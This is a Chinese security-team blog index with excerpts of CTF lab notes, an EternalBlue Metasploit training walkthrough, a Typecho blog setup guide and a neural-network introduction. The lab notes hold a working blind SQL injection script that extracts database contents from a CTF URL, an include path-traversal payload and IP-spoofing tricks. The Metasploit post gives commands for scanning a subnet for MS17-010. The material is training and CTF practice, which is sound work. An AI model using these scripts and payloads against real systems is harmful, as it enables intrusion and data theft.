[靶场笔记]第二章

备份文件 常见的源码泄露有以下几种 .hg源码泄漏 .git源码泄漏 .DS_Store文件泄漏,还有以.phps .bak 重要的是,上面这些备份文件不一定能被dirsearch扫描到 include函数 在php中,include有一条你可能不仔细斟酌就没法理解的话 如果定义了路径——不管是绝对路径(在 Windows 下以盘符或者 \ 开头,在 Unix/Linux 下以 / 开头)还是当前目录的相对路径(以 . 或者 .. 开头)——include_path 都会被完全忽略。例如一个文件以 ../ 开头,则解析器会在当前目录的父目录下寻找该文件。 什么意思呢?如果你有一个路径叫source.php?/../../../../ffffllllaaaagggg,那么在include执行时将忽略/前的字符串而去找/../../../../ffffllllaaaagggg这个文件 并且,你不需要担心这个..回溯写太多了,记住,include会从父级文件搜起,就算你从根目录开始搜也能找到答案 vim备份泄露 后缀是.swp,emm是我经常忘的一个后缀 域名TXT 域名解析的时候会有个叫TXT的附加信息,里面可能藏着东西 页面信息 一定要记得检查页面中的信息,每个可能出现按钮的地方都给他点几下 探针泄露 有种东西叫探针,是用来检测网站搭建时情况的 如果忘记删掉,那么网站信息基本上将被一览无余 经典探针有这些: php雅黑探针 tz.php UenuProbe探针 UPUPW PHP 探针 u.php B-Check探针 iProber探针 浪点PHP探针 C1G PHP探针 phpenv2.1.php 9Gan php探针 js文件 虽然很多时候js文件进不去,但还是得习惯性看一下,有可能存在必须绕过的地方 IP过滤 IP出现问题直接上X-forwarded-For: 127.0.0.1 asp程序和access数据库结合体 这种奇怪的东西一般会存在一个mdb文件(目录:~/db/db.mdb),可以改成txt后缀打开 sql备份 有时候会存在类似像backup.sql这样的备份文件,记得试试(敢这样存的真的不会被骂吗)

April 25, 2023 · 1 min · Red

Echo战队第18次培训——Metasploit之“永恒之蓝”漏洞利用

一、 环境准备 1 一台Windows电脑 (可以使用虚拟机代替) 2 Metasploit任意平台 可以是Windows版,可以是kali自带版 二、 CVE-2017-0144 介绍 1.何为CVE-2017-0144? ​ CVE-2017-0144 既 永恒之蓝最早爆发于2017年4月14日晚,是一种利用Windows系统的SMB协议漏洞来获取系统的最高权限,以此来控制被入侵的计算机。甚至于2017年5月12日, 不法分子通过改造“永恒之蓝”制作了勒索病毒,使全世界大范围内遭受了勒索病毒,甚至波及到学校、大型企业、政府等机构,只能通过支付高额的赎金才能恢复出文件。 2.什么是SMB协议? SMB是一个协议服务器信息块,它是一种客户机/服务器、请求/响应协议,通过SMB协议可以在计算机间共享文件、打印机、命名管道等资源,电脑上的网上邻居就是靠SMB实现的;SMB协议工作在应用层和会话层,可以用在TCP/IP协议之上,SMB使用TCP139端口和TCP445端口。 3.SMB工作原理是什么? (1):首先客户端发送一个SMB negport 请求数据报,,并列出它所支持的所有SMB的协议版本。服务器收到请求消息后响应请求,并列出希望使用的SMB协议版本。如果没有可以使用的协议版本则返回0XFFFFH,结束通信。 (2):协议确定后,客户端进程向服务器发起一个用户或共享的认证,这个过程是通过发送SessetupX请求数据包实现的。客户端发送一对用户名和密码或一个简单密码到服务器,然后通过服务器发送一个SessetupX应答数据包来允许或拒绝本次连接。 (3):当客户端和服务器完成了磋商和认证之后,它会发送一个Tcon或TconX SMB数据报并列出它想访问的网络资源的名称,之后会发送一个TconX应答数据报以表示此次连接是否接收或拒绝。 (4):连接到相应资源后,SMB客户端就能够通过open SMB打开一个文件,通过read SMB读取文件,通过write SMB写入文件,通过close SMB关闭文件。 三、原理 永恒之蓝是在Windows的SMB服务处理SMB v1请求时发生的漏洞,这个漏洞导致攻击者在目标系统上可以执行任意代码。通过永恒之蓝漏洞会扫描开放445文件共享端口的Windows机器,无需用户任何操作,只要开机上网,不法分子就能在电脑和服务器中植入勒索软件、远程控制木马、虚拟货币挖矿机等恶意程序。 四、CVE-2017-0144 利用方法 1 启动Metasploit 终端里输入 msfconsole 2 查询利用模块 终端里输入 search ms17_010 a 3 使用探测模块 终端内输入 use auxiliary/scanner/smb/smb_ms17_010 4 设置探测范围 终端内输入 show options 上图中我们可以看到是需要配置一个RHOSTS 终端内输入 set rhosts 192.168.3.0/24 (设置扫描当前网段 可以通过 在终端内输入ip a 查看) 也可以设置范围 set rhosts 192.168.3.1-192.168.3.10 ...

April 23, 2023 · 1 min · Red

[靶场笔记]第一章

养成题后整理是一个很好的习惯,尽管有点累而且麻烦,但至少能够方便自己回顾错误的地方 web服务器默认访问日志文件 首先是nginx /var/log/nginx/access.log 里面记录了每次用户访问后的User-Agent 同样,Apache也有 /var/log/httpd/access_log 当然Apache的我没有具体验证过,可靠性有待考究 弱比较漏洞 参考博客:PHP弱类型比较(松散比较)方面的漏洞 SQL盲注 盲注其实就是通过页面的特殊响应猜测注入结果是否正常。下面主要分享一下几种常见绕过 过滤空格, 可以使用括号() 或者注释/**/ 绕过 过滤and, 可以使用or替代 过滤union, 可以用盲注替代联合注入 过滤逗号, 可以使用特殊语法绕过, 比如:substr(database(),1,1),这里**可以用substr(database() from 1 for 1)来代替** 下面是一个常见的脱库脚本 import requests url = 'http://53aab0c2-b451-4910-a1e0-f15fd9e64b2a.challenge.ctf.show:8080/index.php?id=-1/**/or/**/' name = '' # 循环45次( 循环次数按照返回的字符串长度自定义) for i in range(1, 45): # 获取当前使用的数据库 # payload = 'ascii(substr(database()from/**/%d/**/for/**/1))=%d' # 获取当前数据库的所有表 # payload = 'ascii(substr((select/**/group_concat(table_name)/**/from/**/information_schema.tables/**/where/**/table_schema=database())from/**/%d/**/for/**/1))=%d' # 获取flag表的字段 # payload = 'ascii(substr((select/**/group_concat(column_name)/**/from/**/information_schema.columns/**/where/**/table_name=0x666C6167)from/**/%d/**/for/**/1))=%d' # 获取flag表的数据 payload = 'ascii(substr((select/**/flag/**/from/**/flag)from/**/%d/**/for/**/1))=%d' count = 0 print('正在获取第 %d 个字符' % i) # 截取SQL查询结果的每个字符, 并判断字符内容 for j in range(31, 128): result = requests.get(url + payload % (i, j)) if 'If' in result.text: name += chr(j) print('数据库名/表名/字段名/数据: %s' % name) break # 如果某个字符不存在,则停止程序 count += 1 if count >= (128 - 31): exit() 信息搜集 肯定会经常见到页面一片空白的情况,或者只有短短的一句类似“where is flag?”这样看着就来气的风凉话 dirsearch就是个不错的信息搜集工具,这里只做提醒,不做详细介绍 ...

April 5, 2023 · 2 min · Red

Echo战队第17次培训——个人博客搭建

众所周知,一个完整博客网站的组成离不开必要的三件套 1.网站基本框架 2.运行网站的服务器 3.一个自己喜欢的域名 可以说是缺一不可 下面就带大家看看完整的博客网站是如何被搭建起来的 准备工作 1.网站框架——Typecho Typecho 是国内开发者开发的一款开源免费的动态博客程序,可以运行在基于 PHP 环境的各种平台上。 官网:Typecho Official Site GitHub:typecho: A PHP Blogging Platform. 相比于同为动态博客并且广为人知的 WordPress 来说,Typecho 的一大特点就是 “精简”。全部文件不足 500KB,但却也实现了完整的主题和插件支持。博客程序很轻量,资源占用也很低,原生支持 Markdown 语法。属于省心并且简洁的博客类型。 2.服务器购买 这里我推荐桔子数据的香港云,关键是价格便宜(不是广告!) 这里是传送门 个人建议买这个 配置随意,但是系统记得选择Ubuntu 20 等待机器初始化完成后再点开安全组 用ssh为名字添加一组新的策略,再点击应用即可 3.域名购买 域名推荐在 Namesilo 购买,价格便宜,同时赠送永久免费的隐私保护。 官网:Namesilo 首先 注册账户。注册信息建议使用美国生成信息,国家选择美国(United States),并勾选 “Keep my information private” 默认使用隐私保护。 然后 搜索想要注册的域名,进行购买。 设置域名续费规则、注册时长等。在 “Have a Coupon……” 处输入优惠码 okoff 或者 go2think ,点击 “Submit” 应用,优惠一美元。 完成后点击 “CONTINUE” 付款,支持支付宝和 Paypal 之后进行域名解析。先进行登录 进到个人主页后点击 ...

April 2, 2023 · 1 min · Red

[我和我的deep learning] 神经网络是什么?

如果有人不相信数学是简单的,那是因为他没有意识到人生有多复杂 ——冯・诺伊曼 让我们先从一个超简单的道理说起。 计算机,应该都有吧?它比人类更擅长的事情是什么?答案肯定是计算 但假如有一张图片摆在你和你的电脑面前 你会第一眼看到什么?一只猫?一块木板?这对你来说不是什么困难的事情 但相比之下,你的电脑要看得懂这张图片,并不是那么容易,事实上,是很困难的 因此我们有理由怀疑观看图片内容这项功能是需要人类智能的,而这是机器所缺乏的 无论我们的机器多复杂多强大,它们依然不是人类 但正因为计算机速度非常快,并且不知疲倦,我们也可以希望计算机能够更好的解决识别图片这项功能 人工智能探讨的就是这项难题 当然,计算机将永远使用电子器件制造,因此人工智能的研究任务就是找到新方法或者新算法,尝试求解这类相对困难的问题。即使不能完美解决,但我们只要求计算机足够出色,让人觉得这是智能的作用 下一章:神经网络是怎么工作的?

March 30, 2023 · 1 min · Red